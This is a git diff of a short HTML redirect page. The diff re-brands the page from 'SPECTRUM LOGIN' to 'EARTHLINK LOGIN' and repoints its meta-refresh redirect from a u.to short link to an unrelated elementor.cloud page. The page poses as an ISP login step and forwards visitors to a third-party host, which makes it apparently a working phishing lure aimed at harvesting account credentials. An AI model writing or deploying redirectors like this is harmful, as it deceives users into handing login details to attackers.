--- a/1ea.html
+++ b/1ea.html
@@ -2,11 +2,11 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://u.to/PElDIg" />
+<meta http-equiv="refresh" content="2; url = https://aneblslm.elementor.cloud/elementor-248" />
 </head>
-<P>SPECTRUM LOGIN
+<P>EARTHLINK LOGIN
 <body>
 <img src="">
-<p>SPECTRUM LOGIN. PLEASE WAIT... Redirecting...</p>
+<p>EARTHLINK LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
